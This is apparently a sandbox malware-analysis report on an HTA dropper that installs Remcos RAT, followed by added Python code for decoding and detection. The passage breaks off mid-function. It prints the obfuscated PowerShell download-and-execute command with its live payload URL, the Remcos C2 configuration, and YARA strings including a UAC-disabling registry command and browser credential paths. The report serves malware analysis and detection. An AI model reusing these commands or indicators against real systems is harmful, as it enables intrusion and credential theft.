
Windows Analysis Report
newthingswithgreatupdateiongivenbestthingswithme.hta

Overview

General Information

Sample name: newthingswithgreatupdateiongivenbestthingswithme.hta
Analysis ID: 1576256
MD5: fd6fc3abb81de5133fb2de54b937ca20
SHA1: 241f7fa153504078a9a9b07f966f3c4e862a9545
SHA256: 73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644
Tags: hta, user-abuse_ch

Detection

Cobalt Strike, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 2504 cmdline: mshta.exe "C:\Users\user\Desktop\newthingswithgreatupdateiongivenbestthingswithme.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 4484 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2568 cmdline: PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 4820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 4228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • nicetomeetyousweeet.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe" MD5: A2D03C5333BFECCA62720CD6EE3A4DC4)
          • WerFault.exe (PID: 1188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 2060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 6044 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 712 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 3664 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 640 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 2416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 7068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 5288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 6044 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 5548 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 3152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 4136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 784 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 5172 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 792 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 5676 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 3796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 720 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
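The powershell.exe stage in the tree above hides its payload behind random casing and a string that PowerShell only assembles at run time: `[cHAr]58` pieces are concatenated into `::`, the result is fed to Invoke-Expression, and the base64 argument decodes to a second script. The Python below is an added analyst example (not part of the Joe Sandbox report) that reproduces what the sandbox's decoder did: it folds the character-code concatenations, pulls out the FromBase64String argument, decodes it and extracts the download URL and drop path. The blob is reproduced from the PID 2568 command line; the obfuscator separates tokens with 34 spaces, and because each base64 group `ICAg` encodes three spaces those runs are written as repetitions so the lines stay readable. The decoded script is an Add-Type P/Invoke of `urlmon!URLDownloadToFile`, which is why csc.exe and cvtres.exe appear as children of powershell.exe.

```python
import base64
import re

# Base64 argument reproduced from the powershell.exe command line in the process
# tree above. Each "ICAg" group encodes three spaces; the padding runs are written
# as repetitions, every other chunk is verbatim from the report.
GAP = "ICAg"
BLOB = "".join([
    "JHJIQVp5bkw1UG1u", GAP * 11, "ID0g", GAP * 11, "QURkLVRZUEUg", GAP * 11,
    "LW1FTWJlUmRFZkluaVRpT24g", GAP * 11,
    "J1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAg", GAP * 10,
    "ICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIg",
    "VVJMRG93bmxvYWRUb0ZpbGUoSW50UHRy", GAP * 11,
    "IEtidUtvVmpvYUxlLHN0cmluZyAg", GAP * 10, "ICBwWWZJLHN0cmluZyAg", GAP * 10,
    "ICBMa0ZHT09RclBIUix1aW50", GAP * 11, "IFdzeE9URlFFZXAsSW50UHRy", GAP * 11,
    "IEFoWFEpOycg", GAP * 11, "LW5hTUUg", GAP * 11, "ImlSRFN1IiAg", GAP * 10,
    "ICAtTmFNZXNQYWNF", GAP * 11, "IE5sT0Nz", GAP * 11, "IC1QYXNzVGhydTsg", GAP * 11,
    "JHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83",
    "NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7",
    "U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24g", GAP * 11,
    "IiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI=",
])

# The outer command line as logged for PID 2568, with the blob in place.
CMDLINE = (
    "PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; "
    "INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58"
    "+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('"
    "+[cHAr]0X22+'" + BLOB + "'+[cHAR]0x22+'))')))"
)

CHAR_TOKEN = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
B64_ARG = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', re.I)
URL = re.compile(r"https?://[^\s\"']+", re.I)
DROP_PATH = re.compile(r"\$env:appdata\\[^\"']+", re.I)


def fold_char_codes(expr):
    """Replace every [cHAr]58 / [cHAr]0x3A with a quoted literal, then glue the
    '+'-joined pieces back into one string, as PowerShell does at run time."""
    def lit(m):
        v = m.group(1)
        code = int(v[2:], 16) if v[:2].lower() == "0x" else int(v)
        return "'" + chr(code) + "'"
    return CHAR_TOKEN.sub(lit, expr).replace("'+'", "")


def analyse(cmdline):
    """Peel the layers of the logged command line; return the decoded script and
    the indicators an analyst wants first."""
    folded = fold_char_codes(cmdline)
    m = B64_ARG.search(folded)
    if not m:
        raise ValueError("no FromBase64String() argument found")
    script = base64.b64decode(m.group(1)).decode("utf-8")
    script = re.sub(r"\s{2,}", " ", script)   # collapse the 34-space padding
    return {
        "folded": folded,
        "script": script,
        "urls": URL.findall(script),
        "drop_paths": sorted({p.lower() for p in DROP_PATH.findall(script)}),
        # Add-Type -MemberDefinition compiles a C# stub: that is the csc.exe child.
        "compiles_csharp": "dllimport" in script.lower(),
    }


if __name__ == "__main__":
    r = analyse(CMDLINE)
    print(r["script"])
    print("download:", r["urls"], "drop:", r["drop_paths"], "P/Invoke:", r["compiles_csharp"])
```

The decoded stage reads, after whitespace collapse, `$rHAZynL5Pmn = ADd-TYPE -mEMbeRdEfIniTiOn '[DllImport("urlmoN.dlL", ...)] ... URLDownloadToFile(...)' ... ; $rHAZynL5Pmn::URLDownloadToFile(0,"http://192.3.179.166/75/ecome.exe","$Env:APPDATA\nicetomeetyousweeet.exe",0,0);START-SlEEp(3);iNvoKE-eXPReSSIon "$ENV:APPDATA\nicetomeetyousweeet.exe"`. Because URLDownloadToFile goes through urlmon, the download also lands in the IE cache (the `ecome[1].exe` file-create event in the Sigma section) before the copy in %APPDATA% is executed.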
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["107.173.4.16:2560:1"], "Assigned name": "elvis", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GJDISH", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
newthingswithgreatupdateiongivenbestthingswithme.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |

Source | Rule | Description | Author | Strings
00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
  • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
(5 of 18 entries shown)
Source | Rule | Description | Author | Strings
6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
(5 of 31 entries shown)

                System Summary

Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", ProcessId: 4820, ProcessName: csc.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2568, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2568, TargetFilename: C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))", CommandLine: PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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
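The Sigma hits above fire on four features of this chain that are cheap to check in process-creation and file-creation telemetry: mshta.exe spawning a shell, csc.exe started by a script host with its input in a Temp directory, powershell.exe writing an executable to disk, and the random-case command line. The Python below is an added example (not part of the report and not the Sigma rules themselves) that encodes each of those checks as a simplified rule and runs them over constructed Sysmon-style events mirroring the process tree. Long command lines are truncated in the sample data, the parent of mshta.exe is not in the report and is assumed to be explorer.exe, the rule labels are this example's own, and a benign PowerShell launch is included as a control that must not match.

```python
import ntpath  # basename() understands backslash paths on any OS

# Constructed Sysmon-style events (EventID 1 = process create, 11 = file create)
# mirroring this report's process tree and Sigma file-create hits. Command lines
# are truncated; mshta's parent is assumed; PID 9001 is a benign control.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"EventID": 1, "ProcessId": 2504, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\user\Desktop\newthingswithgreatupdateiongivenbestthingswithme.hta"'},
    {"EventID": 1, "ProcessId": 4484, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon(...)"'},
    {"EventID": 1, "ProcessId": 2568, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": PS,
     "CommandLine": "PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon(...)"},
    {"EventID": 11, "ProcessId": 2568, "Image": PS,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe"},
    {"EventID": 11, "ProcessId": 2568, "Image": PS,
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"},
    {"EventID": 1, "ProcessId": 4820, "ParentImage": PS,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"'},
    {"EventID": 1, "ProcessId": 7088, "ParentImage": PS,
     "Image": r"C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe"'},
    {"EventID": 1, "ProcessId": 9001, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS, "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
DROPPED_EXT = (".exe", ".dll", ".scr", ".ps1", ".vbs", ".js", ".hta")


def base(path):
    return ntpath.basename(path).lower()


def case_flip_ratio(token):
    """Share of adjacent letter pairs that change case: 0.0 for 'powershell',
    close to 1.0 for 'PoWeRsHelL'. Digits and punctuation are ignored."""
    letters = [c for c in token if c.isalpha()]
    if len(letters) < 2:
        return 0.0
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return flips / (len(letters) - 1)


def rule_mshta_child(e):
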